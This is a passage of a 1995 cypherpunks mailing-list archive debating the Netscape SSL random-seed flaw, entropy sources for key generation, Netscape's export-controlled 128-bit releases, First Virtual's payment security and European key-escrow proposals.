designing a new circuit structure. You probably can, actually. CMOS and BiCMOS have all sorts of structures in which threshold voltages can be measured. DRAM arrays have various seemingly-random (*) discharge characteristics. Zener diodes can be built in any of these technologies. At small enough structural levels, such as we are now seeing at the .35 micron level and below, noise is omnipresent, and is dealt with in various ways. Thus, using the noise is not so difficult. (* The various charge/discharge characteristics are actually not random, of course, and are reproducible. But with care they can be used to increase the entropy of other soources. Care must be taken.) >Do we know any solid state physics / circuit design experts who think >this might be a fun thing to do? I bet you could get a paper out of >it. And probably improve the world a few years later, when companies >used your paper to close another hole in their computer security. I'm skeptical for the reasons given above. Even starting today, far too long to get enough out there. (Far-future thinkers will say, "Then let's start now," but it still is not true that companies like Netscape or Verisign will use such an invention to close another hole...they could only close the hole for the customers who had the HRNG-equipped machines, and this is not likely to be enough for quite some time. As John knows, but others may not, I worked on random noise effects in devices at Intel. A co-worker (now President of IC Works, Ilbok Lee) and I developed a hardware random number generator based on very low level radiation sources, using an effect I discovered. We tried to get a patent on it, in 1978, but there was no interest by Intel. Personally, I think that "software + user actions + environment stuff" can generate vast amounts of usable entropy, especially if a user lets it accumulate immediately prior to generating crypto material. * Software -- the standard cryptographic hash functions to "mix" bits even further. * User Actions -- mouse movements, keyboard timing, microphone noise, etc. * Environmental Stuff -- measurement of disk access timings, in milliseconds, amount of free blocks, Ethernet packet stuff, etc. (This may or may not be good for more than a few bits per second, but can be accumulated for several minutes or hours.) Any of these has various weaknesses and points of attack. But let's face it, would Golberg and Wagner have been able to crack Netscape if the PRNG had used some mouse swirling, some random keyboard pounding, some disk access measurements, and had then hashed this with a noninvertible hash function? I think not. This approach has the benefit of working almost immediately, without special dongles on the back of machines or of convincing Intel and Motorola to add special functions (which would take years to effectively penetrate the market). --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From cwe at Csli.Stanford.EDU Wed Sep 20 20:45:57 1995 From: cwe at Csli.Stanford.EDU (Christian Wettergren) Date: Wed, 20 Sep 95 20:45:57 PDT Subject: netscape's response In-Reply-To: <199509202215.PAA14101@ix.ix.netcom.com> Message-ID: <199509210153.SAA25449@Csli.Stanford.EDU> Christian (that's me) writes: | I think it is important to bring together factors of the user _and_ | the environment, preferrable an environment that reaches as far from | the local site as possible. This makes "jamming" of the random seed | selection process harder. | | The other problem in gathering random bits for a seed is that most | bits are visible by someone else close enough within your environment. | Interarrival times of packets are fine, but anyone can observe them | with quite a good accuracy. How do you escape the "local environment | problem"? | | . - . | | One wild idea that I just got was to have servers and clients exchange | random numbers (not seeds of course), in a kind of chaining way. Since | most viewers connect to a number of servers, and all servers are | connected to by many clients, they would mix "randomness sources" with | each other, making it impossible to observe the local environment | only. And the random values would of course be encrypted under the | session key, making it impossible to "watch the wire". | | Problems: | * watch out for "multiply by zero" attacks by a rogue server/client. | * watch out for "almost singular values" in the same way. | * only let one source contribute a certain amount of randomness, like | (key length)/(aver # of peers). | * never reveal your current seed, only a non-trivially derived random | value from it. (of course) | * make sure your initial seed is good enough, or the whole thing is | broken. | * perhaps save part of the previous session state into a protected | file, to be able to keep up the quality of the initial seed. | | I think I like it, perhaps not from a practical point of view as much | as the 'non-attackability' of it. Its quite cypher-a. Bill Stewart answered: | | Be _very_ careful with this approach - it's the kind of thing that a | rogue server or client might abuse to find out randomness or other state | information about the clients or servers connecting to it. Of course you have to be very careful, as you say. Did you see my problem-section in the original letter? I included it above. Since then I have realized that the | * only let one source contribute a certain amount of randomness, like | (key length)/(aver # of peers). really should be | * only let one source contribute a certain amount of randomness, like | (large entropy buffer)/(aver # of peers). and that you should only give out approximately the same amount of randomness to the neighbour, as you point out below. | At minimum, only give out some of your randomness, XORed with some | arbitrary value to scramble the range and then hashed before sending, | so that the recipient can't find out the values you're using. My approach solves part of the problem of "the observable local environment" problem. Jeff's reply to this suggestion might be somewhat dangerous, if the exchanged 'randomness bits' are the challenge/responses in the exchange. (Based on his remark of not needing to change protocol.) You would arguably not want to have the loop RNG --> "unguessable chall/resp" ---+ /\ | +---------------------------------+ I would say that the only acceptable solution would be to have (viewer)consumer <-------------------->consumer (srv) /\ /\ | | ---> RNG1 <----------------------> RNG2 <----- RNGn /\ /\ | | RNGx RNGy separating the "building up" of randomness from the consuming phase of that built up randomness, the actual part which has to be totally unpredicate. /Christian From shields at tembel.org Wed Sep 20 20:46:12 1995 From: shields at tembel.org (Michael Shields) Date: Wed, 20 Sep 95 20:46:12 PDT Subject: MIME In-Reply-To: <199509201253.IAA21521@tequesta.gate.net> Message-ID: > >I think that it must be the content-type that is causing problems, > > Yes, I agree. Make it something like ASCII text But it's not text/plain. It's PGP'ed text/plain. The only way to indicate this in MIME is with a content-type. (Yes, they're working on a general way to encapsulate encryption.) Fine, I'll just leave mail to the list unsigned. -- Shields. From herbs at interlog.com Wed Sep 20 20:46:26 1995 From: herbs at interlog.com (Herb Sutter) Date: Wed, 20 Sep 95 20:46:26 PDT Subject: Please send me SSL problems... Message-ID: <199509210134.VAA09069@gold.interlog.com> At 18:18 1995.09.20 -0400, Ian Goldberg wrote: >In article <199509201004.DAA23933 at ammodump.mcom.com>, >Jeff Weinstein wrote: >> >> I'd just like to let all cypherpunks know that I'm really interested in >>getting any feedback you might have about security problems with Netscape >>products. I'm particularly interested in bugs in the our implementation >>of SSL, and problems in the protocol that are not addressed in SSL 3.0. > >Well, if you'd release Netscape source, we could check its >implementation... :-) > > - Ian Mmm... sounds like they want some free consulting. :-) (BTW, Ian, you're at UofW? I thought your original 'discovery' email of three days ago had a berkeley.edu address on it... anyway, if you are a UofW'er, hello from a fellow Waterloo math/cs grad!) Herb ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Herb Sutter 2228 Urwin, Suite 102 voice (416) 618-0184 Connected Object Solutions Oakville ON Canada L6L 2T2 fax (905) 847-6019 From jsw at netscape.com Wed Sep 20 20:46:40 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Wed, 20 Sep 95 20:46:40 PDT Subject: netscape's response Message-ID: <9509201835.ZM154@tofuhut> NOTE: my first attempt to send this bounced at toad.com On Sep 20, 5:16pm, David_A Wagner wrote: > Subject: Re: netscape's response > In article <9509200139.ZM206 at tofuhut> you write: > > On Sep 20, 12:29am, Christian Wettergren wrote: > > > One wild idea that I just got was to have servers and clients exchange > > > random numbers (not seeds of course), in a kind of chaining way. Since > > > most viewers connect to a number of servers, and all servers are > > > connected to by many clients, they would mix "randomness sources" with > > > each other, making it impossible to observe the local environment > > > only. And the random values would of course be encrypted under the > > > session key, making it impossible to "watch the wire". > > > > Wow, this is a great idea!! > > Are you quite sure this is a good idea? > > I'd be very scared of it. In particular, it opens up the chance for > adversaries to feed you specially chosen numbers to pollute your seeds. What I should have said is that its a very interesting idea. Given current perceptions of netscape, I should have made clear that I wouldn't do something like this without getting a lot more discussion and review of possible dangers and how to avoid them. I certainly can't fault anyone for wondering if we would just implement this without thinking it through, given recent events. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From nsb at nsb.fv.com Wed Sep 20 20:46:59 1995 From: nsb at nsb.fv.com (Nathaniel Borenstein) Date: Wed, 20 Sep 95 20:46:59 PDT Subject: first virtual "security" (!!) (was Re: Security Flaw Is Discovered In Software Used in Shopping) In-Reply-To: Message-ID: <0kMA2EqMc50eMEb4Yx@nsb.fv.com> Laurent -- I strongly recommend that you make an effort to understand the real risks involved in Internet commerce. There are critical security flaws in the encrypted commerce approach, which I fear you are overlooking. By focusing on the ease of stealing a single identifier, or faking a single transaction, I think you overlook some much more important issues. The point is not that people can't intercept your First Virtual ID by sniffing on the net. Obviously they can. The point is not that people can't forge mail from you. Obviously they can. The point is not that people can't intercept FV's confirmation query, which contains a one-time code, and forge the appropriate response to authorize that purchase. Obviously they can. The point is not that people can't selectively block your incoming mail, so that you can't even tell when the above has happened. Obviously they can. The point is that if someone goes to all the trouble of doing all the above -- which is what it takes to commit serious fraud with First Virtual -- then *all* that they get is the temporary use, on the Internet only, of a single credit card. (Note also that I've just spelled out *exactly* what it takes to commit fraud with FV. I am suspicious of any commerce systems that don't offer such an explanation. In the case of SSL, the explanation would probably start out, "find a single bug in the implementation of the cryptographic algorithms.") Schemes like SSL, which encrypt a credit card number and then transmit it on the net, carry with them a very different kind of risk: the risk that a single criminal could steal MILLIONS of credit card numbers. If an SSL-like scheme were in wide use world-wide, the hacker who just made a name for himself by breaking SSL could instead have gone down in HISTORY as the person who destroyed the twentieth-century credit card system by stealing millions of credit cards and using each one just once. Or, if his goals were more practical, he could have simply chosen any desired level of affluence and lived that way for the rest of his life. (This is not an exaggeration. I can flesh this out to an alarming degree of detail, actually.) FV does not claim to have invented a method of commerce that is foolproof. There is no such system, and that certainly includes the existing credit card, cash, and check infrastructure. What FV has invented is a system for Internet commerce in which the risk/reward ratio is sufficiently low to permit large-scale commerce. Any cryptographic approaches which make similar claims must also be evaluated in terms of risk/reward ratio. If a system has a catastrophic risk, no matter how low-probability, this is worse than a system with higher-probability risks of much lower consequence. (When driving my car, I'd rather be in ten fender-benders than one high-speed head-on collision at 90 MPH.) My own experience with real-world software -- which is only confirmed by the recent SSL scandal -- makes me tend to believe that every program has bugs, and that therefore every crypto system will carry with it a significant practical risk of compromise. It therefore makes no sense to design the commerce infrastructure in such a way that the cost of that risk is catastrophic. FV has had several minor incidents of fraud. They didn't make any headlines and they didn't require any mad scramble to fix the software, because the costs of the fraud were so low to all concerned. -- Nathaniel -------- Nathaniel S. Borenstein | When privacy is outlawed, Chief Scientist, First Virtual Holdings | only outlaws will have privacy! FAQ & PGP key: nsb+faq at nsb.fv.com | SUPPORT THE ZIMMERMANN DEFENSE FUND! ---VIRTUAL YELLOW RIBBON-->> zldf at clark.net From iang at cory.EECS.Berkeley.EDU Wed Sep 20 20:47:15 1995 From: iang at cory.EECS.Berkeley.EDU (Ian Goldberg) Date: Wed, 20 Sep 95 20:47:15 PDT Subject: Euro-Clipper Message-ID: <199509210102.SAA15389@cory.EECS.Berkeley.EDU> I don't think I've seen this here (but it was on a bunch of security newsgoups...) - Ian Forwarded message: > > According to an article in `Communications Week International', the > 34-nation Council of Europe has agreed to outlaw strong encryption > products which do not make keys available to governments. > > The article, `Euro-Clipper chip scheme proposed', is on the front page > of the magazine's issue 151, dated 18th September, which arrived in my > mail this morning. > > It relates that the policy was approved on the 8th September at > Strasbourg by the Council, and coincides with an attempt by the > European Commission to propose a pan-European encryption standard. The > Council - unlike the Commission - has no statutory powers to enforce > its recommendations. However, Peter Csonka, the chairman of the > committee that drafted the document (and an administrative officer at > the Council's division of crime problems) says that `it is rare for > countries to reject Council of Europe recommendations'. > > The proposal would make telecomms operators responsible for decrypting > traffic and supplying it to governments when asked. It would also > `change national laws to enable judicial authorities to chase hackers > across borders'. > > Opposition to this measure was expressed by Mike Strezbek, VP > responsible for European telecomms at JP Morgan, who said that his > organisation `will challenge any attempt to limit the power of our > network encryption technologies very strongly'. > > Czonka said that the Council had given consideration to business > interests but had tries to strike a balance between privacy and > justice. However, `it remains possible that cryptography is available > to the public which cannot be deciphered,' his document says. `This > might lead to the conclusion to put restrictions on the possession, > distribution, or use of cryptography.' > > Apparently another international organisation, the OECD, has called a > conference of its members in December to devise a strategy on > encryption. > > I for one will be making clear to my MP that his stand on this issue > will determine how I cast my ballot at the next election. I note that > John Major stated in a 1994 parliamentary written reply to David Shaw > MP that the government did not intend to legislate on data encryption. > I am disppointed that government policy has changed to the point of > supporting the Council of Europe, and that this change has sneaked > through during the parliamentary recess. > > Ross Anderson > > > > From perry at piermont.com Wed Sep 20 20:47:30 1995 From: perry at piermont.com (Perry E. Metzger) Date: Wed, 20 Sep 95 20:47:30 PDT Subject: USA Today on Fear of Credit Cards over Net In-Reply-To: Message-ID: <199509202335.TAA05761@frankenstein.piermont.com> Re: The risk of credit cards. I suppose that indeed there are large risks elsewhere in the credit card system. However, I think that the credit card system itself is stupid and insecure and ought to be scrapped -- sending around account numbers as magic keys to get payment is a stupid move. Its not suprising how large credit card fraud is. One of the great hopes I have for cryptographic technology is its ability to lower the incidence of fraud, and thus lower transaction costs a lot. Someday, hopefully, everyone will be able to be a credit card merchant because you won't have to trust the merchants not to steal. Perry From dvw at hamachi.epr.com Wed Sep 20 20:47:52 1995 From: dvw at hamachi.epr.com (David Van Wie) Date: Wed, 20 Sep 95 20:47:52 PDT Subject: Encryption algorithms used in PrivaSoft (fwd) Message-ID: <3060D3B3@hamachi> David Clavadetscher of PrivaSoft writes: > At this time our crypto engine is patented and proprietary. Ian Goldberg writes: > Waitasec... I was under the impression that if you patented it, you had to > reveal it. That's why RC4 isn't patented (it used to be a trade secret). Many technologies have both patented parts and trade secret parts. Often, companies will maintain information that is in patent applications as trade secret until they are granted. I guess I should say _if_ they are granted! After a patent is granted, it is usually a good idea to also maintain some trade secrets in your products -- since trade secrets never "expire," unlike patents. If the patent isn't granted, you still have the option of treating the contents as an intellectual property under trade secret protection. dvw From dl at hplyot.obspm.fr Wed Sep 20 20:48:09 1995 From: dl at hplyot.obspm.fr (Laurent Demailly) Date: Wed, 20 Sep 95 20:48:09 PDT Subject: netscape bug In-Reply-To: <199509201855.LAA17261@netcom16.netcom.com> Message-ID: <9509210259.AA09589@hplyot.obspm.fr> Vladimir Z. Nuri writes: [... some good points and other less good (imo) deleted ...] [.... netscape is good for us stuff ....] > Netscape is a world class product, and it's *free*. on this cypherpunks > list, I have seen no end to the venemous criticisms that people level at > *free* products, which IMHO is quite tasteless at times. FYI Netscape IS NOT FREE, at all. re-read the Licence that you shall read before clicking . (though it is not a problem in itself (helas ppl must work for a living and sell stuff), apart from the unsecurity through obscurity which is often a result of commercial products) [.... netscape is good for us stuff ....] > it reminds me of how much people here rant at Microsoft when > virtually no other company on the planet could pull off what they make > look easy (ah, that's another story I've filled up other posts with). Duh ... I would'nt have insulted Netscape by quoting Micro$oft in the same post ;-) (half joking) [.... netscape is good for us stuff ....] dl -- Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|... Freedom Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept Qaddafi hack fissionable munitions terrorist Saddam Hussein Clinton From dl at hplyot.obspm.fr Wed Sep 20 20:48:42 1995 From: dl at hplyot.obspm.fr (Laurent Demailly) Date: Wed, 20 Sep 95 20:48:42 PDT Subject: first virtual "security" (!!) (was Re: Security Flaw Is Discovered In Software Used in Shopping) In-Reply-To: Message-ID: <9509210232.AA09480@hplyot.obspm.fr> You have excellent points in your detailed answer, thank you, but If FV was as used as SSL could be, what prevents, to use your terms, someone to get MILLIONS of FV's identifiers and use each one only once, etc ... (imo your figures about SSL and crypto softs risks are over evaluated, so I over evaluate the 'risks' of yours using same assumptions) There can't be more security by transferring data on the clear compared to an encrypted one... except maybe that people using encryption can often feel overconfident. So, as someone pointed out, it is not that much a problem about CC# which are available easily anyway, but in fact, using encrypted communications is the only way to ensure (some) *privacy*, in addition to being a security improvement. A problem is to avoid to fail on "customer expectation", especially when you've created it. So probably there was too much focus and advertising on security issues on the internet, by the very same companies that prove later to fail, giving wrong expectation. Privacy remains a goal anyway, and financial insecurity never was a problem as long as it remains under a small %. So I'd prefer to use crapy netscape 1.1 40 bits export SSL than your system... Though what I'd really use is PGP :-) Anyway, if you have happy customers, good for you... I'd suggest that you'd use "Security through Clarity" as motto ;-) dl -- Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|... Freedom Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept fissionable SEAL Team 6 Kaser Sose nuclear Clinton domestic disruption DST From dl at hplyot.obspm.fr Wed Sep 20 20:49:03 1995 From: dl at hplyot.obspm.fr (Laurent Demailly) Date: Wed, 20 Sep 95 20:49:03 PDT Subject: Netscape Servers too ? (forwarded message from Marc VanHeyningen) Message-ID: <9509210319.AA09639@hplyot.obspm.fr> ------- start of forwarded message (RFC 934 encapsulation) ------- From: marcvh at spry.com (Marc VanHeyningen) To: Wayne Wilson Cc: Kazuma Andoh , www-security at ns2.rutgers.edu Subject: Re: What's the netscape problem Date: Wed, 20 Sep 1995 07:51:47 -0700 [...] > http://home.netscape.com/newsref/std/random_seed_security.html The interesting part of this article is the discussion of random seed weaknesses on the *server* side. If true, this means anybody could use the random-seed hole to reverse engineer the process by which the server's private key information was generated and break that keypair with much, much much less effort than would normally be needed to factor a 512-bit RSA key. (Note that I'm not entirely sure Netscape's server uses 512 bit RSA keys, since the documentation, technical data sheets, and generation process don't give any clue about what key size is being used. Guess they don't want customers worrying their pretty little heads about it.) This would mean merely getting a fixed server would be insufficient; every Netscape server user would need to generate a new keypair, get a new Verisign certificate, and revoke the old one. (Oops, wait, there's no way to revoke the old one. I guess you just have to hope nobody does this before all those certificates expire.) - - Marc ------- end ------- dl -- Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|... Freedom Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept smuggle nuclear North Korea SDI cracking Mossad DES From jsimmons at goblin.punk.net Wed Sep 20 20:49:14 1995 From: jsimmons at goblin.punk.net (Jeff Simmons) Date: Wed, 20 Sep 95 20:49:14 PDT Subject: /dev/random for Linux In-Reply-To: <199509202227.SAA05667@frankenstein.piermont.com> Message-ID: <199509210319.UAA04352@goblin.punk.net> > > > On this same track, I suggest that "/dev/random" devices for unix are > an excellent idea. Ted Tso did one for Linux that steals all the bits > of semi-random timing information it can. > Anyone know where I can find more information on this wonderful device? -- Jeff Simmons jsimmons at goblin.punk.net From perry at piermont.com Wed Sep 20 20:49:58 1995 From: perry at piermont.com (Perry E. Metzger) Date: Wed, 20 Sep 95 20:49:58 PDT Subject: /dev/random for Linux In-Reply-To: <199509210319.UAA04352@goblin.punk.net> Message-ID: <199509210349.XAA06110@frankenstein.piermont.com> Jeff Simmons writes: > > On this same track, I suggest that "/dev/random" devices for unix are > > an excellent idea. Ted Tso did one for Linux that steals all the bits > > of semi-random timing information it can. > > Anyone know where I can find more information on this wonderful device? I'd ask him. tytso at mit.edu. I've cc'ed him on the mail. Perry From dl at hplyot.obspm.fr Wed Sep 20 21:05:02 1995 From: dl at hplyot.obspm.fr (Laurent Demailly) Date: Wed, 20 Sep 95 21:05:02 PDT Subject: Project: a standard cell random number generator In-Reply-To: Message-ID: <9509210404.AA09855@hplyot.obspm.fr> On the opposite, using some kind of small hardware devices plugged in the serial or // port could be a good point to help actual sales of softwares that would depend on it (ie you sell the hardware only with the soft, so ppl have to actually buy it to get full security instead of stealing it). [I'm playing devil's lawyer here] dl -- Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|... Freedom Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept KGB Uzi plutonium Ortega Mossad South Africa cracking From jirib at cs.monash.edu.au Wed Sep 20 21:23:36 1995 From: jirib at cs.monash.edu.au (Jiri Baum) Date: Wed, 20 Sep 95 21:23:36 PDT Subject: Exchange random numbers (was: Re: netscape's response) In-Reply-To: <199509200729.AAA24565@Csli.Stanford.EDU> Message-ID: <199509210419.OAA28994@molly.cs.monash.edu.au> -----BEGIN PGP SIGNED MESSAGE----- Hello cypherpunks at toad.com and Christian Wettergren Christian Wettergren wrote: ... > One wild idea that I just got was to have servers and clients exchange > random numbers (not seeds of course), in a kind of chaining way. Since ... Okay, that doesn't sound so hard... Have a look at http://www.cs.monash.edu.au/cgi-bin/cgiwrap/~jirib/random?RandValue where you replace RandValue by any text string. Please do not try to break the implementation, I *know* you can overrun buffers, use shell metacharacters and generally stuff around. Just don't, OK? Thanks. Feel free to try to break the algorithm, though. > Problems: > * watch out for "multiply by zero" attacks by a rogue server/client. > * watch out for "almost singular values" in the same way. Don't know about these... > * only let one source contribute a certain amount of randomness, like > (key length)/(aver # of peers). Well I don't keep track of entropy, so that doesn't apply, does it... > * never reveal your current seed, only a non-trivially derived random > value from it. (of course) I reveal md5 hash of my seed only. > * make sure your initial seed is good enough, or the whole thing is > broken. Well, entropy put in must be greater than entropy used or lost through cracked connections. (Ie not just "initial", also entropy put in along the way.) I fail this point either way. > * perhaps save part of the previous session state into a protected > file, to be able to keep up the quality of the initial seed. Yup, I do that (though "quality" would be quite a bit of a euphemism, and the file is hardly protected at all). Have fun! Jiri - -- PGP 463A14D5 -----BEGIN PGP SIGNATURE----- Version: 2.6.2i iQCVAwUBMGDnpixV6mvvBgf5AQEExQQAsqCTmTOI0aT7YBnCsYyvEp0y3gWFFZdf qbG5wvpFGvJMvRxn8A61AEeX0CkQ7ZLVDwAo4K6N+SGMeXDWKkUtHRBS1cHomgJP Kf98rFxHXp3SS1eXUKEyzlcY0zkXQ4wunR7nsBAlvVVPcexINZ2++2bFKyyUKNTm KZ39Fj1TEf4= =oC33 -----END PGP SIGNATURE----- From Sal at panix.com Wed Sep 20 21:37:29 1995 From: Sal at panix.com (Sal Denaro) Date: Wed, 20 Sep 95 21:37:29 PDT Subject: AOL monitoring In-Reply-To: Message-ID: > > 2) My .newsrc file can tell anyone that I read alt.hackers and alt.2600 > Hmmm...potential new crypto product...a "secure" newsreader with encrypted > .newsrc? Why not write a shell script to decrypt you .newsrc, run your reader then re-encrypt the .newsrc file ? Why not do that for you mail address book file as well ? Hey, this is cypher-punks- DIY :) -- Salvatore Denaro sal at panix.com I waited for the joke/It never did arrive. Yes, I use PGP Words I thought I'd choke/I hardly recognize. From jsw at neon.netscape.com Wed Sep 20 22:01:21 1995 From: jsw at neon.netscape.com (Jeff Weinstein) Date: Wed, 20 Sep 95 22:01:21 PDT Subject: FROM A FRIEND . . . In-Reply-To: <199509201648.MAA14624@panix.com> Message-ID: <43qrhf$gd5@tera.mcom.com> In article <199509201648.MAA14624 at panix.com>, frissell at panix.com (Duncan Frissell) writes: > >Updating Customers: > >Netscape will provide the fix for Export (40 bit) versions of Netscape > >Navigator later this week for downloading by customers on the Internet. > >Similarly, the > >Commerce Server patch for Export versions (40 bit) will be made available > >from our home page. Because downloading of 128 bit versions of the software . >is still not permitted by U.S. law, U.S. customers of Netscape Navigator, > >Netscape Navigator Personal Edition and Netscape Commerce Server using 128 > >bit versions can request the replacement from Netscape for delivery through > >the regular mail. > > Funny, MIT and MPJ and others manage to enable the downloading of > export-controlled software. Also, wasn't there some sort of promise by > Netscape after we broke the 40-bit version to make the 128-bit version > available to US users under the Beta/freeware system? What happened to that > plan? We are also examining some sort of binary patch technology, so that folks with the US-only version can easily download and apply the patch. I think that the general opinion of engineers and management here at Netscape is that it would be A Really Good Thing to have our US-only 128+ bit version of Netscape Navigator available for download by US citizens and others who are not legally prohibited from using it. As a matter of fact, up until the RNG thing hit on sunday night, I had been making myself a major pain in the ass to netscape managers and executive, bugging them every day for at least the past several weeks, to get a decision about making the US version available for free download. I know that MIT, RSA, and others make crypto code available for download with various mechanism. I'm sure that these institutions did not make the decision lightly. This issue is now a very high priority for our lawyers, but it will take some time for them to reach a legal opinion about Netscape's legal exposure. The fact that MIT and RSA have done it does not mean that the government will not go after Netscape for similar behavior. We all know what a juicy target Netscape is these days... :-) We have submitted our proposal for download checking to the State Dept. I think that our process does more validation than what others have done. The State Dept. has so far refused to send us any kind of written approval of our proposed methods. I know that many of you think that this is futile, and I won't dispute that, but I think we do have to make the effort in order for our case to hold up later. We do share your frustration at being forced to use weak crypto. This has been a major pain for us, but I believe that we are committed to continuing to produce a version with strong crypto (as long as it remains legal - sigh). I for one will always fight to ensure that we have a version of our Navigator that supports "strong" crypto, and to make that version easily and widely available. The governments attempts to get companies to produce watered down versions for the US because it is easier will not succeed here as long as I have any say in the matter. Also, the company has taken a vocal public position against the current ITAR restrictions and any sort of mandatory or government controlled key escrow. We are working on it. Please try to be patient. It is just as hard for us as it is for you... --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From jsw at neon.netscape.com Wed Sep 20 22:05:54 1995 From: jsw at neon.netscape.com (Jeff Weinstein) Date: Wed, 20 Sep 95 22:05:54 PDT Subject: NSA and Netscape Crack In-Reply-To: Message-ID: <43qrpq$gd5@tera.mcom.com> In article , norm at netcom.com (Norman Hardy) writes: > At 3:46 PM 9/19/95, Jim Ray wrote: > .... > >I don't expect to know NSA's specific brute-force capability, but > >does anyone know if the NSA has *ever* found a glaring weakness in > >software and then told its author(s) or owner(s) about it? Do "we" > >perform the "COMSEC" role Tim was speaking of better than the NSA? > >JMR > .... > Once upon a time NSA would find weeknesses in friends' crypto systems and > tell them about it -- depending, of course, on the situation. It was a > reciprocal practice. We don't know that NSA didn't tell Netscape. As far as I know the NSA did not tell Netscape anything about this RNG vulnerability. If they had we would have fixed it immediately and put up a patch. Believe it or not we don't like being trashed for being stupid all over the net, print media, and TV. As far as I know the NSA have not given us any advice about how to make our system stronger. I've heard rumors that they were quite upset when they learned that SSLs 40-bit RC4 was actually 40-bit secret and 88-bit salt. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From jamesd at echeque.com Wed Sep 20 22:19:11 1995 From: jamesd at echeque.com (James A. Donald) Date: Wed, 20 Sep 95 22:19:11 PDT Subject: Silly NetScape RND tricks... Message-ID: <199509210519.WAA08441@blob.best.net> At 12:05 PM 9/20/95 -0400, Deranged Mutant wrote: > >I've only been skimming the NetScape-related posts lately, but I've yet >to see anyone mention using a keyboard-timing sampler as a source for >some random bits Under windows, you get a lot more entropy from mouse timing and position than keyboard hits. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From eay at mincom.oz.au Wed Sep 20 22:24:52 1995 From: eay at mincom.oz.au (Eric Young) Date: Wed, 20 Sep 95 22:24:52 PDT Subject: Please send me SSL problems... In-Reply-To: Message-ID: A few commnets from Tim Hudson who has put SSL into telnet and ftp, he is not on this list but since he is my personal 'put SSL into applications' person (I just write the library :-), I felt his comments would be better than mine :-) On Wed, 20 Sep 1995, Erik E. Fair wrote: > Jeff, the SSL specification has a severe *architectural* problem - it > assumes that Internet Protocols are APIs - interface standards, and that ... > You can't fiddle with a communication protocol without getting agreement > from everyone about the change, or extend it in a way that is compatible > with the protocol you're modifying, on a per-protocol basis (e.g. adding a > TELNET negotiation option to TELNET for encryption, an FTP command to FTP, > etc). Otherwise, all you've done is made a private, non-interoperable [tjh] I agree with this statement - application of SSL at the TCP level for all communication is possible but *not* desirable in the general case - i.e. for internet communication. A much better approach (and the one that I have taken for adding SSL into TELNET and FTP) is to use *existing* negotiation mechanisms for dynamically switching on SSL for a given link based on determining dynamically if the server you are connecting to will support it. Naturally you want options at both the server and the client that enable you to: - fall back to "normal/insecure" mode if SSL is not available - drop the connection in the client if SSL is not negotiated - drop the connection in the server if SSL is not negotiated My aim was when adding SSL (in the form of SSLeay) into an existing server was *always* to be able to run the *one* server for both the "old" and the "new" protocol. I really was getting annoyed at seeing announcements of yet-another-security package that could be installed that provided another potentially insecure access path into the system that only supported connecting to it with it's own fixed protocol. SSL can be seen in it simpliest form as just a nice mechanism for dynamically negotiating a *cipher* - this is how I initially set things up so that the "normal" authentication mechanisms had to still be used for connection - i.e. SSLtelnet still required the normal account password to get access. This has since been "enhanced" so that you can switch on an option that uses a certificate exchange as the security access mechanism (this is not switched on by default). For TELNET the "best" place to start seemed to be the work done with SRATELNET ... it already had all the hooks in the right places for using the RFC-defined TELNET extensions that enabled negotiation of authentication and encryption. (the documentation that came with SRAtelnet was also nice and clear too). For FTP there was a similar was of doing things so I used it too ... and FTP is a *great* example of a protocol where doing things at the TCP level (tranparently) would be "bad" - it used two ports ... one of which is usually dynamically allocated ... and you certainly don't want to redo the initial SSL negotiation for each file that you transfer! (SSLftp reuses the session ID). Another thing that is worth noting (and worth looking at too) is the different API offered in SSLREF and SSLeay (... naturally I prefer SSLeay as I have influence over the author ;-) ... From what I know of the SSLREF API, it takes the approach of providing wrapper functions that you use *instead* of the "normal" functions ... there is (not using the right names) SSLaccept and SSLconnect that you use that perform the accept() and connect() along with all the other things required in the SSL protocol being hidden which sounds nice until you want to do something like FTP ... where the connection for the DATA socket is formed in the opposite direction to the CONTROL socket - with SSLeay you do the accept() and connect() yourself ... as per normal and then run SSL_accept() or SSL_connect() which does the "logical" SSL stuff ... so in FTP I can do a connect() and then an SSL_accept() which looks funny but is the "right" thing to do. SSLeay has only 2 function calls that operate on socket file descriptors, a singe read() and a single write(). The most recent version will handle non-blocking IO if the application passes a file desciptor with it turned on. SSLeay does not do a single setsockopt(), ioctl(), fcntl(), accept(), bind(), select() etc. If you haven't looked at SSLeay or looked and the SSL protocol itself then you really should grab it and have a read (while ignoring the politics and the WWW hype over SSL). Tim [eay] While there are problems with certificate distribution, this will be overcome. Ever tried general inter-realm authentication with Kerberos? Both SSLref and SSLeay interoperate. From what I know of the SSLref API, our API's are quite different. Just because SSLref may 'force' you towards a particular style of SSL use does not mean the protocol forces you to use it this way. eric Standard billboard http://www.psy.uq.oz.au/~ftp/Crypto/ ftp.psy.uq.oz.au:/pub/Crypto/SSL/ ftp.psy.uq.oz.au:/pub/Crypto/SSLapps/ -- Eric Young | Signature removed since it was generating AARNet: eay at mincom.oz.au | more followups than the message contents :-) From 